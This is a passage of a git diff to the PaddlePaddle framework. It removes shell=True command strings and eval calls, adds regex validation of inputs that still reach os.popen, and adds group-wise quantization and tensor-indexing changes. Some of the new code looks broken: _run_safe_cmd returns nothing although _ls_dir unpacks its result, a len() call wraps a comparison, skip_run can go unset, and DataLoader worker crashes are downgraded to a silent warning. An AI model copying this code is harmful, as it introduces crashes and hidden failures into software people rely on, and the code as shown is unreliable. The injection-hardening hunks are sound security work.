+            skip_var_names = _get_feed_fetch_var_names(feed, fetch_list)
             _apply_inplace_addto_pass(
                 program, enable_inplace, enable_addto, skip_var_names
             )
@@ -2476,7 +2480,7 @@ def _run_from_dataset(
 
         reused_trainer = program._heter_pipeline_opt is not None or (
             program._fleet_opt is not None
-            and program._fleet_opt.get("use_ps_gpu", True)
+            and program._fleet_opt.get("use_ps_gpu", False)
         )
 
         if reused_trainer is False:
diff --git a/python/paddle/base/framework.py b/python/paddle/base/framework.py
index c0d128d4fbbb31..c3a65971ffd983 100644
--- a/python/paddle/base/framework.py
+++ b/python/paddle/base/framework.py
@@ -5582,8 +5582,7 @@ def draw(self, save_path, name, marked_nodes=None, remove_ctr_var=True):
         def _convert_to_pdf(dot_file_path):
             pdf_save_path = os.path.splitext(dot_file_path)[0] + '.pdf'
             exited_code = subprocess.call(
-                'dot -Tpdf ' + dot_file_path + ' -o ' + pdf_save_path,
-                shell=True,
+                ['dot', '-Tpdf', dot_file_path, '-o', pdf_save_path]
             )
             if exited_code != 0:
                 print('The dot command is needed for creating pdf files.')
diff --git a/python/paddle/base/layers/math_op_patch.py b/python/paddle/base/layers/math_op_patch.py
index bf1d737970327d..f3ba8aa5e197e8 100644
--- a/python/paddle/base/layers/math_op_patch.py
+++ b/python/paddle/base/layers/math_op_patch.py
@@ -538,8 +538,10 @@ def __impl__(self, other_var):
                             op_type, lhs_dtype, rhs_dtype
                         )
                         warnings.warn(
-                            f"The input dtypes of OP {op_type} are {lhs_dtype} and {rhs_dtype}, "
-                            "the output will be auto-promoted to {common_dtype}"
+                            f"The input dtypes of OP {op_type} are {lhs_dtype} and {rhs_dtype}, the output will be auto-promoted to {common_dtype}"
+                        )
+                        warnings.filterwarnings(
+                            "ignore", message="The input dtypes of OP"
                         )
                         if rhs_dtype != common_dtype:
                             other_var = astype(other_var, common_dtype)
diff --git a/python/paddle/base/variable_index.py b/python/paddle/base/variable_index.py
index f3a04076ef3fbd..533d0360764a8a 100644
--- a/python/paddle/base/variable_index.py
+++ b/python/paddle/base/variable_index.py
@@ -12,6 +12,7 @@
 # See the License for the specific language governing permissions and
 # limitations under the License.
 
+
 import warnings
 
 import numpy as np
@@ -136,7 +137,6 @@ def deal_attrs(attrs, attr, attr_name, tensor_attr_name, inputs, infer_flags):
         attrs[attr_name] = attr
 
 
-# the item is a tensor of bool
 def get_value_for_bool_tensor(var, item):
     if len(item.shape) > len(var.shape):
         raise IndexError(
@@ -191,7 +191,9 @@ def _setitem_for_tensor_array(var, item, value):
         )
 
 
-def deal_advanced_index(ori_tensor, indices, is_for_setitem):
+def deal_advanced_index(
+    ori_tensor, indices, is_for_setitem, values, out_is_view=True
+):
     """
     Transpose origin Tensor and advanced indices to the front.
 
@@ -201,6 +203,7 @@ def deal_advanced_index(ori_tensor, indices, is_for_setitem):
         trans_back_dim (List): order of axes to transpose back to original order. Only used in __setitem__.
         pos_of_new_dim (int):  axis of new dim in the result. Only used in __getitem__.
         rank_of_new_dim (int): rank of new dim in the result. Only used in __getitem__.
+        transed_value_tensor (Tensor): value tensor transed to the front. Only used in __setitem__.
     """
     transed_dim = []
     transed_index = []
@@ -212,24 +215,38 @@ def deal_advanced_index(ori_tensor, indices, is_for_setitem):
 
     for i, indice in enumerate(indices):
         if indice is not None:
-            if not is_for_setitem:
-                if i == 0:
-                    # case 1: advanced indices at axis 0, the new dim will be at first.
-                    pos_of_new_dim = 0
-                if i > 0 and len(transed_dim) > 0 and transed_dim[-1] != i - 1:
-                    # case 2: there are not adjacent advanced indices, the new dim will be at first.
-                    pos_of_new_dim = 0
-                else:
-                    pos_of_new_dim = min(pos_of_new_dim, i)
-                rank_of_new_dim = max(rank_of_new_dim, indice[1].ndim)
+            if i == 0:
+                # case 1: advanced indices at axis 0, the new dim will be at first.
+                pos_of_new_dim = 0
+            if i > 0 and len(transed_dim) > 0 and transed_dim[-1] != i - 1:
+                # case 2: there are not adjacent advanced indices, the new dim will be at first.
+                pos_of_new_dim = 0
+            else:
+                pos_of_new_dim = min(pos_of_new_dim, i)
+            rank_of_new_dim = max(rank_of_new_dim, indice[1].ndim)
             transed_dim.append(i)
             transed_index.append(indice[1])
     for i in range(ori_tensor.ndim):
         if indices[i] is None:
             transed_dim.append(i)
-    transed_tensor = ori_tensor.transpose(transed_dim)
 
     trans_back_dim = np.argsort(transed_dim).tolist() if is_for_setitem else []
+    transed_value_tensor = None
+
+    if transed_dim == list(range(ori_tensor.ndim)):
+        transed_tensor = ori_tensor
+        if is_for_setitem:
+            transed_value_tensor = values
+    else:
+        out_is_view = True
+        transed_tensor = ori_tensor.transpose(transed_dim)
+        if is_for_setitem:
+            if values.ndim > 1 and pos_of_new_dim != 0:
+                # If the value tensor is not a scalar / 1-D Tensor, and the src tensor was
+                # transposed at 1st dim, the value tensor should be transposed too.
+                transed_value_tensor = values.transpose(transed_dim)
+            else:
+                transed_value_tensor = values
 
     return (
         transed_tensor,
@@ -237,11 +254,25 @@ def deal_advanced_index(ori_tensor, indices, is_for_setitem):
         trans_back_dim,
         pos_of_new_dim,
         rank_of_new_dim,
+        transed_value_tensor,
+        out_is_view,
     )
 
 
 def parse_index(x, indices):
-    advanced_index = [None] * 2 * len(x.shape)  # content is (dim, index)
+    from .framework import in_pir_mode
+
+    if in_pir_mode():
+        is_tensor_array = x.is_dense_tensor_array_type()
+    else:
+        is_tensor_array = (
+            hasattr(x, "desc")
+            and x.desc.type() == core.VarDesc.VarType.LOD_TENSOR_ARRAY
+        )
+
+    advanced_index = (
+        [] if is_tensor_array else [None] * 2 * len(x.shape)
+    )  # content is (dim, index)
     # for set_value / slice / strided_slice OP
     decrease_axes = []
     axes = []
@@ -258,11 +289,6 @@ def parse_index(x, indices):
     indices = replace_ellipsis(x, indices)
     indices, none_axes = replace_none(indices)
 
-    is_tensor_array = (
-        hasattr(x, "desc")
-        and x.desc.type() == core.VarDesc.VarType.LOD_TENSOR_ARRAY
-    )
-
     estimated_dim = 0
     dim = 0
     for i, slice_item in enumerate(indices):
@@ -550,7 +576,12 @@ def _setitem_static(x, indices, values):
         #   3. assign values to the sliced result by index_put OP;
         #   4. transpose back and assign the result to original tensor by set_value OP.
 
-        sub_tensor = get_tensor_with_basic_indexing(
+        if not isinstance(
+            values, (Variable, paddle.pir.Value, paddle.pir.OpResult)
+        ):
+            values = paddle.assign(values).astype(x.dtype)
+
+        sub_tensor, is_view = get_tensor_with_basic_indexing(
             x,
             axes,
             starts,
@@ -566,18 +597,41 @@ def _setitem_static(x, indices, values):
             transback_dim,
             _,
             _,
-        ) = deal_advanced_index(sub_tensor, advanced_index, True)
-        if not isinstance(values, (Variable, paddle.pir.Value)):
-            values = paddle.assign(values).astype(transed_sub_tensor.dtype)
+            values,
+            is_view,
+        ) = deal_advanced_index(
+            sub_tensor, advanced_index, True, values, is_view
+        )
 
         if values.dtype != transed_sub_tensor.dtype:
             values = values.astype(transed_sub_tensor.dtype)
 
-        if in_dynamic_or_pir_mode():
-            # NOTE(zoooo0820): directly return result instead of another set_value, after backward bug fixed.
-            transed_sub_tensor = transed_sub_tensor.index_put_(
-                adjusted_advanced_index, values
-            )
+        if paddle.in_dynamic_mode():
+            if (
+                len(adjusted_advanced_index) == 1
+                and adjusted_advanced_index[0].dtype
+                in (paddle.bool, paddle.base.libpaddle.BOOL)
+                and len(
+                    adjusted_advanced_index[0].shape
+                    == len(transed_sub_tensor.shape)
+                )
+            ):
+                if values.shape != transed_sub_tensor.shape:
+                    values = values.expand(transed_sub_tensor.shape)
+                transed_sub_tensor = paddle._C_ops.where_(
+                    paddle.logical_not(adjusted_advanced_index[0]),
+                    transed_sub_tensor,
+                    values,
+                )
+                if not is_view:
+                    return x
+            else:
+                # NOTE(zoooo0820): directly return result instead of another set_value, after backward bug fixed.
+                transed_sub_tensor = transed_sub_tensor.index_put_(
+                    adjusted_advanced_index, values
+                )
+                if not is_view:
+                    return x
         else:
             transed_sub_tensor = transed_sub_tensor.index_put(
                 adjusted_advanced_index, values
@@ -624,12 +678,14 @@ def get_tensor_with_basic_indexing(
 ):
     from .dygraph.base import in_to_static_mode
 
+    out_is_view = False
     if in_to_static_mode() and hasattr(x, "is_view_var"):
         x.is_view_var = True
 
     if len(axes) == 0:
         out = x
     else:
+        out_is_view = True
         op_type = "strided_slice" if use_strided_slice else "slice"
         inputs = {'Input': [x]}
         attrs = {
@@ -677,6 +733,8 @@ def get_tensor_with_basic_indexing(
                     if isinstance(end, (list, tuple)):
                         if paddle.utils._contain_var(end):
                             end = paddle.utils.get_int_tensor_list(end)
+                    if x.is_dense_tensor_array_type():
+                        return paddle._pir_ops.slice_array_dense(x, st), False
                 out = paddle._C_ops.slice(
                     x,
                     axes,
@@ -703,17 +761,9 @@ def get_tensor_with_basic_indexing(
                 attrs=attrs,
             )
             out = slice_out_var
-    # NOTE(zoooo0820): When all axes are decreased, the output will be 1-D
-    # with FLAGS_set_to_1d=True. In this case, one `None` should be pop out,
-    # otherwise the output shape will be not correct.
-    set_to_1d = paddle.get_flags('FLAGS_set_to_1d')['FLAGS_set_to_1d']
-    if set_to_1d and len(decrease_axes) == len(x.shape):
-        warnings.warn(
-            "Warning: In Tensor '__getitem__', if the number of scalar elements in the index is equal to the rank of the Tensor, the output should be 0-D. In order to be consistent with the behavior of previous versions, it will be processed to 1-D. But it is not correct and will be removed in release 2.6. If 1-D is still wanted, please modify the index element from scalar to slice (e.g. 'x[i]' => 'x[i:i+1]')."
-        )
-        none_axes = none_axes[1:]
 
     if len(none_axes) > 0:
+        out_is_view = True
         # Deal with cases that decrease_axes is not empty
         # For example:
         # # x.shape: (2,3,4)
@@ -727,7 +777,7 @@ def get_tensor_with_basic_indexing(
 
     if in_to_static_mode() and hasattr(out, "is_view_var"):
         out.is_view_var = True
-    return out
+    return out, out_is_view
 
 
 def _getitem_static(x, indices):
@@ -750,7 +800,7 @@ def _getitem_static(x, indices):
     ) = parse_index(x, indices)
 
     # step2: Dealing with basic indexing
-    out = get_tensor_with_basic_indexing(
+    out, _ = get_tensor_with_basic_indexing(
         x,
         axes,
         starts,
@@ -769,13 +819,14 @@ def _getitem_static(x, indices):
             _,
             pos_of_new_dim,
             rank_of_new_dim,
-        ) = deal_advanced_index(out, advanced_index, False)
+            _,
+            _,
+        ) = deal_advanced_index(out, advanced_index, False, None)
 
         # TODO(zooooo0820): Replacing gather_nd to another advanded OP for handling of mixed indexes more efficiently
-        if (
-            len(adjusted_advanced_index) == 1
-            and adjusted_advanced_index[0].dtype == paddle.bool
-        ):
+        if len(adjusted_advanced_index) == 1 and adjusted_advanced_index[
+            0
+        ].dtype in (paddle.bool, paddle.base.libpaddle.BOOL):
             # Note: now slice not support 0-size Tensor, so only one bool tensor can return empty 0-size.
             out = get_value_for_bool_tensor(
                 transed_tensor, adjusted_advanced_index[0]
@@ -797,8 +848,8 @@ def _getitem_static(x, indices):
 
         if pos_of_new_dim != 0:
             perm = (
-                list(range(pos_of_new_dim, pos_of_new_dim + rank_of_new_dim))
-                + list(range(0, pos_of_new_dim))
+                list(range(rank_of_new_dim, pos_of_new_dim + rank_of_new_dim))
+                + list(range(0, rank_of_new_dim))
                 + list(range(pos_of_new_dim + rank_of_new_dim, out.ndim))
             )
             out = out.transpose(perm)
diff --git a/python/paddle/dataset/common.py b/python/paddle/dataset/common.py
index 4695b633ffa0fd..35155a2de2d226 100644
--- a/python/paddle/dataset/common.py
+++ b/python/paddle/dataset/common.py
@@ -18,6 +18,7 @@
 import importlib
 import os
 import pickle
+import re
 import shutil
 import sys
 import tempfile
@@ -71,6 +72,11 @@ def md5file(fname):
 
 
 def download(url, module_name, md5sum, save_name=None):
+    module_name = re.match("^[a-zA-Z0-9_/\\-]+$", module_name).group()
+    if isinstance(save_name, str):
+        save_name = re.match(
+            "^(?:(?!\\.\\.)[a-zA-Z0-9_/\\.-])+$", save_name
+        ).group()
     dirname = os.path.join(DATA_HOME, module_name)
     if not os.path.exists(dirname):
         os.makedirs(dirname)
diff --git a/python/paddle/distributed/auto_tuner/prune.py b/python/paddle/distributed/auto_tuner/prune.py
index 94f0a67a21debc..a86ce0f31dd367 100644
--- a/python/paddle/distributed/auto_tuner/prune.py
+++ b/python/paddle/distributed/auto_tuner/prune.py
@@ -510,17 +510,42 @@ def prune_by_memory_estimation(tuner_cfg, cur_cfg, history_cfgs=[]):
             "max_mem_usage should be set when using memory estimation tool"
         )
 
-    memory_estimation_cmd = f"python {memory_estimation_tool} --dp_degree {cur_cfg['dp_degree']} --mp_degree {cur_cfg['mp_degree']} \
-                                --pp_degree {cur_cfg['pp_degree']} --vpp_degree {cur_cfg['vpp_degree']} \
-                                --sharding_degree {cur_cfg['sharding_degree']} --sharding_stage {cur_cfg['sharding_stage']} \
-                                --use_recompute {cur_cfg['use_recompute']} --micro_batch_size {cur_cfg['micro_batch_size']} \
-                                --recompute_granularity {cur_cfg['recompute_granularity']} \
-                                --hidden_size {model_cfg['hidden_size']} --num_attention_heads {model_cfg['num_attention_heads']} \
-                                --num_layers {model_cfg['num_layers']} --max_sequence_length {model_cfg['max_sequence_length']} \
-                                --vocab_size {model_cfg['vocab_size']} --intermediate_size {model_cfg['intermediate_size']} "
+    memory_estimation_cmd = [
+        "python",
+        memory_estimation_tool,
+        "--dp_degree",
+        str(cur_cfg['dp_degree']),
+        "--mp_degree",
+        str(cur_cfg['mp_degree']),
+        "--pp_degree",
+        str(cur_cfg['pp_degree']),
+        "--vpp_degree",
+        str(cur_cfg['vpp_degree']),
+        "--sharding_degree",
+        str(cur_cfg['sharding_degree']),
+        "--sharding_stage",
+        str(cur_cfg['sharding_stage']),
+        "--use_recompute",
+        str(cur_cfg['use_recompute']),
+        "--micro_batch_size",
+        str(cur_cfg['micro_batch_size']),
+        "--recompute_granularity",
+        str(cur_cfg['recompute_granularity']),
+        "--hidden_size",
+        str(model_cfg['hidden_size']),
+        "--num_attention_heads",
+        str(model_cfg['num_attention_heads']),
+        "--num_layers",
+        str(model_cfg['num_layers']),
+        "--max_sequence_length",
+        str(model_cfg['max_sequence_length']),
+        "--vocab_size",
+        str(model_cfg['vocab_size']),
+        "--intermediate_size",
+        str(model_cfg['intermediate_size']),
+    ]
     result = subprocess.run(
         memory_estimation_cmd,
-        shell=True,
         capture_output=True,
         text=True,
     )
diff --git a/python/paddle/distributed/fleet/base/role_maker.py b/python/paddle/distributed/fleet/base/role_maker.py
index ddc6c411598c34..4859a438a930a7 100755
--- a/python/paddle/distributed/fleet/base/role_maker.py
+++ b/python/paddle/distributed/fleet/base/role_maker.py
@@ -13,6 +13,7 @@
 # limitations under the License.
 """Definition of Role Makers."""
 import os
+import re
 import time
 import warnings
 from multiprocessing import Manager, Process
@@ -988,7 +989,9 @@ def _ps_env(self):  # each role will execute it
                     raise ValueError(
                         "Can not find PADDLE_STAGE_TRAINERS_NUM, please check your environment."
                     )
-                self._stage_trainers = eval(self._stage_trainers)
+                self._stage_trainers = tuple(
+                    [int(x) for x in re.findall(r'\d+', self._stage_trainers)]
+                )
             cur_port = os.getenv("PADDLE_PORT", None)
             if cur_port is None:
                 raise ValueError(
@@ -1040,7 +1043,9 @@ def _ps_env(self):  # each role will execute it
                 raise ValueError(
                     "Can not find PADDLE_STAGE_TRAINERS_NUM, please check your environment."
                 )
-            self._stage_trainers = eval(self._stage_trainers)
+            self._stage_trainers = tuple(
+                [int(x) for x in re.findall(r'\d+', self._stage_trainers)]
+            )
 
             self._heter_trainer_device_type = os.getenv(
                 "HETER_DEVICE_TYPE", None
diff --git a/python/paddle/distributed/fleet/utils/fs.py b/python/paddle/distributed/fleet/utils/fs.py
index 743ceac3e296cc..51aeeb6840d0a4 100644
--- a/python/paddle/distributed/fleet/utils/fs.py
+++ b/python/paddle/distributed/fleet/utils/fs.py
@@ -18,6 +18,7 @@
 import os
 import re
 import shutil
+import subprocess
 import time
 
 # (TODO: GhostScreaming) It will be removed later.
@@ -513,6 +514,34 @@ def _run_cmd(self, cmd, redirect_stderr=False, retry_times=5):
 
         return ret, output.splitlines()
 
+    def _run_safe_cmd(self, cmd, redirect_stderr=False, retry_times=5):
+        exe_cmd = [self._base_cmd] + cmd.split()
+        ret = 0
+        output = ""
+        retry_sleep_second = 3
+        for x in range(retry_times + 1):
+            try:
+                process = subprocess.run(
+                    exe_cmd,
+                    check=True,
+                    stdout=subprocess.PIPE,
+                    stderr=subprocess.STDOUT
+                    if redirect_stderr
+                    else subprocess.PIPE,
+                    text=True,
+                )
+                output = process.stdout
+                break
+            except subprocess.CalledProcessError as e:
+                ret = e.returncode
+                output = e.output
+                time.sleep(retry_sleep_second)
+            except Exception as e:
+                break
+
+        if ret == 134:
+            raise FSShellCmdAborted(cmd)
+
     @_handle_errors()
     def list_dirs(self, fs_path):
         """
@@ -582,8 +611,8 @@ def ls_dir(self, fs_path):
         return self._ls_dir(fs_path)
 
     def _ls_dir(self, fs_path):
-        cmd = f"ls {fs_path}"
-        ret, lines = self._run_cmd(cmd)
+        cmd = ["-ls", fs_path]
+        ret, lines = self._run_safe_cmd(cmd)
 
         if ret != 0:
             raise ExecuteError(cmd)
diff --git a/python/paddle/distributed/launch/controllers/collective.py b/python/paddle/distributed/launch/controllers/collective.py
index 13d8ef403504ab..9e0f46584653c8 100644
--- a/python/paddle/distributed/launch/controllers/collective.py
+++ b/python/paddle/distributed/launch/controllers/collective.py
@@ -45,7 +45,10 @@ def build_pod(self):
         ):
             return self._build_pod_with_args()
         else:
-            return self._build_pod_with_master()
+            if self.ctx.args.auto_parallel_config is None:
+                skip_run = True
+            # only when skip_run is Flase, should not reset pod
+            return self._build_pod_with_master(skip_run)
 
     def _build_pod_with_tuner(self):
         auto_parallel_config = self.ctx.args.auto_parallel_config
@@ -148,7 +151,7 @@ def _build_pod_with_args(self):
 
         return True
 
-    def _build_pod_with_master(self):
+    def _build_pod_with_master(self, reset_pod=True):
         self.pod.replicas = self.pod_replicas()
 
         # rank will be reset when restart
@@ -203,7 +206,8 @@ def _build_pod_with_master(self):
 
         job_endpoints = [i['endpoints'] for i in peer_list]
 
-        # self.pod.reset()
+        if reset_pod:
+            self.pod.reset()
         selected_dev_key = self.ctx.node.device.get_selected_device_key()
         selected_dev_list = self.ctx.node.device.get_selected_devices(
             self.ctx.args.devices
diff --git a/python/paddle/distributed/rpc/rpc.py b/python/paddle/distributed/rpc/rpc.py
index 0d88c8fef1ce51..273fc1bcc0196b 100644
--- a/python/paddle/distributed/rpc/rpc.py
+++ b/python/paddle/distributed/rpc/rpc.py
@@ -142,7 +142,7 @@ def init_rpc(name, rank=None, world_size=None, master_endpoint=None):
 
 def rpc_sync(to, fn, args=None, kwargs=None, timeout=_DEFAULT_RPC_TIMEOUT):
     """
-    Make a blocking RPC call to run function ``fn`` on worker ``to``.
+    Make a blocking RPC call to run function ``fn`` on worker ``to``. Attention: Users must use this API in a secure network environment.
 
     Args:
         to (str): name of the destination worker.
@@ -182,7 +182,7 @@ def rpc_sync(to, fn, args=None, kwargs=None, timeout=_DEFAULT_RPC_TIMEOUT):
 
 def rpc_async(to, fn, args=None, kwargs=None, timeout=_DEFAULT_RPC_TIMEOUT):
     """
-    Make a non-blocking RPC call to run function ``fn`` on worker ``to``.
+    Make a non-blocking RPC call to run function ``fn`` on worker ``to``. Attention: Users must use this API in a secure network environment.
 
     Args:
         to (str): name of the destination worker.
diff --git a/python/paddle/hapi/hub.py b/python/paddle/hapi/hub.py
index c39fa57ad56816..f25640804fdbcc 100644
--- a/python/paddle/hapi/hub.py
+++ b/python/paddle/hapi/hub.py
@@ -117,7 +117,6 @@ def _get_cache_or_reload(repo, force_reload, verbose=True, source='github'):
             hub_dir,
             check_exist=not force_reload,
             decompress=False,
-            method=('wget' if source == 'gitee' else 'get'),
         )
         shutil.move(fpath, cached_file)
 
diff --git a/python/paddle/incubate/distributed/fleet/fleet_util.py b/python/paddle/incubate/distributed/fleet/fleet_util.py
index 1777afffe9aaf4..9af91e4f5b148c 100644
--- a/python/paddle/incubate/distributed/fleet/fleet_util.py
+++ b/python/paddle/incubate/distributed/fleet/fleet_util.py
@@ -18,6 +18,7 @@
 import logging
 import math
 import os
+import re
 import sys
 import time
 
@@ -1317,23 +1318,12 @@ def get_online_pass_interval(
                 ...     is_data_hourly_placed=False)
 
         """
-        assert (
-            "|" not in days
-            and ";" not in days
-            and "\\" not in days
-            and "/" not in days
-            and "(" not in days
-            and ")" not in days
-        ), r"days should not contain [|,;,\,/,(,)]"
+        pattern = r'^\d+|{[0-9]+}|{[0-9]+\.\.[0-9]+}$'
+        if not re.fullmatch(pattern, str(days)):
+            raise Exception("days format is not right")
         days = os.popen("echo -n " + days).read().split(" ")
-        assert (
-            "|" not in hours
-            and ";" not in hours
-            and "\\" not in hours
-            and "/" not in hours
-            and "(" not in hours
-            and ")" not in days
-        ), r"hours should not contain [|,;,\,/,(,)]"
+        if not re.fullmatch(pattern, str(hours)):
+            raise Exception("hours format is not right")
         hours = os.popen("echo -n " + hours).read().split(" ")
         split_interval = int(split_interval)
         split_per_pass = int(split_per_pass)
diff --git a/python/paddle/io/dataloader/dataloader_iter.py b/python/paddle/io/dataloader/dataloader_iter.py
index ed64f5da3d9e93..84260dc90ca562 100644
--- a/python/paddle/io/dataloader/dataloader_iter.py
+++ b/python/paddle/io/dataloader/dataloader_iter.py
@@ -704,10 +704,11 @@ def _get_data(self):
                 if len(failed_workers) > 0:
                     self._exit_thread_unexpectedly()
                     pids = ', '.join(str(w.pid) for w in failed_workers)
-                    raise RuntimeError(
-                        f"DataLoader {len(failed_workers)} workers exit unexpectedly, "
-                        f"pids: {pids}"
+                    logging.warning(
+                        "DataLoader {} workers exit unexpectedly, "
+                        "pids: {}".format(len(failed_workers), pids)
                     )
+                    return
 
                 # get(timeout) will call _poll(timeout) and may raise IOError
                 if isinstance(e, (IOError, queue.Empty)):
diff --git a/python/paddle/jit/dy2static/convert_operators.py b/python/paddle/jit/dy2static/convert_operators.py
index a6cfb4cd8c3993..bf44c2a47dcbb0 100644
--- a/python/paddle/jit/dy2static/convert_operators.py
+++ b/python/paddle/jit/dy2static/convert_operators.py
@@ -726,7 +726,12 @@ def convert_var_dtype(var, dtype):
         }
         return paddle.cast(var, dtype=cast_map[dtype])
     else:
-        return eval(f'{dtype}(var)')
+        assert dtype in [
+            'bool',
+            'int',
+            'float',
+        ], f"The casted target dtype is {dtype}, which is not supported in type casting."
+        return eval(dtype)(var)
 
 
 def convert_assert(cond, message=""):
diff --git a/python/paddle/nn/quant/format.py b/python/paddle/nn/quant/format.py
index 2e58f1ef2b8b62..0074389b3bc554 100644
--- a/python/paddle/nn/quant/format.py
+++ b/python/paddle/nn/quant/format.py
@@ -46,7 +46,14 @@ def from_quanter(quanter):
 
 
 class LinearQuanter(Layer):
-    def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8):
+    def __init__(
+        self,
+        scales,
+        zero_point=None,
+        quant_axis=None,
+        bit_length=8,
+        group_size=128,
+    ):
         super().__init__()
         scales = paddle.to_tensor(scales, dtype="float32")
         scale_attr = paddle.framework.ParamAttr(
@@ -65,9 +72,21 @@ def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8):
         )
         self._quant_axis = -1 if quant_axis is None else quant_axis
         self._bit_length = bit_length
+        self._group_size = group_size
 
     def forward(self, input):
         if in_dynamic_mode():
+            if len(self._scales.shape) > 1:
+                bnt = (1 << (self._bit_length - 1)) - 1
+                new_s = paddle.repeat_interleave(
+                    self._scales, self._group_size, 0
+                )
+                quant_weight = paddle.clip(
+                    paddle.round(input.cast('float32') / new_s * bnt),
+                    -bnt - 1,
+                    bnt,
+                )
+                return quant_weight.cast(input.dtype)
             return _C_ops.quantize_linear(
                 input.cast('float32'),
                 self._scales,
@@ -105,7 +124,14 @@ def from_quanter(quanter):
 
 
 class LinearDequanter(Layer):
-    def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8):
+    def __init__(
+        self,
+        scales,
+        zero_point=None,
+        quant_axis=None,
+        bit_length=8,
+        group_size=128,
+    ):
         super().__init__()
         scales = paddle.to_tensor(scales, dtype="float32")
         scale_attr = paddle.framework.ParamAttr(
@@ -124,9 +150,18 @@ def __init__(self, scales, zero_point=None, quant_axis=None, bit_length=8):
         )
         self._quant_axis = -1 if quant_axis is None else quant_axis
         self._bit_length = bit_length
+        self._group_size = group_size
 
     def forward(self, input):
         if in_dynamic_mode():
+            if len(self._scales.shape) > 1:
+                bnt = (1 << (self._bit_length - 1)) - 1
+                new_s = paddle.repeat_interleave(
+                    self._scales, self._group_size, 0
+                )
+                quant_dequant_weight = input.cast('float32') / bnt * new_s
+                return quant_dequant_weight.cast(input.dtype)
+
             return _C_ops.dequantize_linear(
                 input.cast('float32'),
                 self._scales,
diff --git a/python/paddle/quantization/observers/__init__.py b/python/paddle/quantization/observers/__init__.py
index 733b3e7dbb9812..9bb662b53626ea 100644
--- a/python/paddle/quantization/observers/__init__.py
+++ b/python/paddle/quantization/observers/__init__.py
@@ -14,5 +14,6 @@
 # limitations under the License.
 
 from .abs_max import AbsmaxObserver
+from .groupwise import GroupWiseWeightObserver
 
-__all__ = ["AbsmaxObserver"]
+__all__ = ["AbsmaxObserver", "GroupWiseWeightObserver"]
diff --git a/python/paddle/quantization/observers/groupwise.py b/python/paddle/quantization/observers/groupwise.py
new file mode 100644
index 00000000000000..9d30a7101c1128
--- /dev/null
+++ b/python/paddle/quantization/observers/groupwise.py
@@ -0,0 +1,113 @@
+# Copyright (c) 2023 PaddlePaddle Authors. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import numpy as np
+
+import paddle
+
+from ..base_observer import BaseObserver
+from ..factory import ObserverFactory
+
+
+class GroupWiseWeightObserver(ObserverFactory):
+    r"""
+    It collects channel-wise maximum absolute values of target weights.
+    Args:
+        bit_length(int, optional): Number of bits to represent an quantized integer in binary.
+        dtype(str, optional): The data type of input tensor.
+        name (str, optional): This parameter is used by developers to print debugging information. \
+            For details, please refer to :ref:`api_guide_Name`. Default is None.
+    Examples:
+       .. code-block:: python
+            from paddle.quantization import QuantConfig
+            from paddle.quantization.quanters import AbsMaxChannelWiseWeightObserver
+            quanter = AbsMaxChannelWiseWeightObserver()
+            q_config = QuantConfig(activation=None, weight=quanter)
+    """
+
+    def __init__(self, quant_bits=8, group_size=128):
+        super().__init__(quant_bits=quant_bits)
+
+    def _get_class(self):
+        return GroupWiseWeightObserverLayer
+
+
+class GroupWiseWeightObserverLayer(BaseObserver):
+    def __init__(self, layer, quant_bits=8, group_size=128):
+        super().__init__()
+        self.quant_bits = quant_bits
+        self.group_size = group_size
+        self._layer = layer
+        self._max = None
+        self._scale = None
+        self._zero_point = None
+
+    def forward(self, inputs):
+        self._max = self._cal_abs_max(inputs)
+        return inputs
+
+    def _cal_abs_max(self, inputs):
+        """Use group_size to group the input, then use the
+        absmax method to calculate the scale
+        """
+        input_shape = inputs.shape
+        assert (
+            self.group_size == 64 or self.group_size == 128
+        ), "group_size only support 64 or 128"
+        assert (
+            inputs.shape[0] % self.group_size == 0
+        ), "group_size must be a factor of input channels"
+        assert len(inputs.shape) == 2, "Currently only support 2D tensor"
+        input_processed = inputs.transpose([1, 0]).reshape(
+            [input_shape[1], input_shape[0] // self.group_size, self.group_size]
+        )
+
+        abs_max_values = paddle.max(paddle.abs(input_processed), axis=2).cast(
+            "float32"
+        )
+        abs_max_values = paddle.where(
+            abs_max_values == np.float32(0), np.float32(1e-8), abs_max_values
+        )
+        abs_max_values = abs_max_values.transpose([1, 0])
+        return abs_max_values
+
+    def min_value(self) -> float:
+        return 0.0
+
+    def max_value(self) -> float:
+        return self._max
+
+    def bit_length(self):
+        return self._quant_bits
+
+    def quant_axis(self):
+        return -1
+
+    def cal_thresholds(self):
+        """Compute thresholds for MAX function."""
+        if self._scale is None:
+            self._scale = self._max
+        self._zero_point = paddle.zeros_like(self._scale)
+
+    def scales(self):
+        """Return output scales."""
+        if self._scale is None:
+            self.cal_thresholds()
+        return self._scale
+
+    def zero_points(self):
+        """Return output zero points."""
+        if self._zero_point is None:
+            self.cal_thresholds()
+        return self._zero_point
diff --git a/python/paddle/quantization/quantize.py b/python/paddle/quantization/quantize.py
index b7887ffc46e1c4..7606c4bb3e1827 100644
--- a/python/paddle/quantization/quantize.py
+++ b/python/paddle/quantization/quantize.py
@@ -28,8 +28,9 @@
 class Quantization(metaclass=abc.ABCMeta):
     r"""
     Abstract class used to prepares a copy of the model for quantization calibration or quantization-aware training.
+
     Args:
-        config(QuantConfig) - Quantization configuration
+        config(QuantConfig): Quantization configuration
     """
 
     def __init__(self, config: QuantConfig):
@@ -43,10 +44,11 @@ def quantize(self, model: Layer, inplace=False):
     def convert(self, model: Layer, inplace=False, remain_weight=False):
         r"""Convert the quantization model to ONNX style. And the converted
         model can be saved as inference model by calling paddle.jit.save.
+
         Args:
-            model(Layer) - The quantized model to be converted.
-            inplace(bool, optional) - Whether to modify the model in-place, default is False.
-            remain_weight(bool, optional) - Whether to remain weights in floats, default is False.
+            model(Layer): The quantized model to be converted.
+            inplace(bool, optional): Whether to modify the model in-place, default is False.
+            remain_weight(bool, optional): Whether to remain weights in floats, default is False.
 
         Return: The converted model
 
@@ -72,7 +74,12 @@ def convert(self, model: Layer, inplace=False, remain_weight=False):
         for name, child in _model.named_children():
             quant_dequant = None
             if isinstance(child, ConvertibleQuantedLayer):
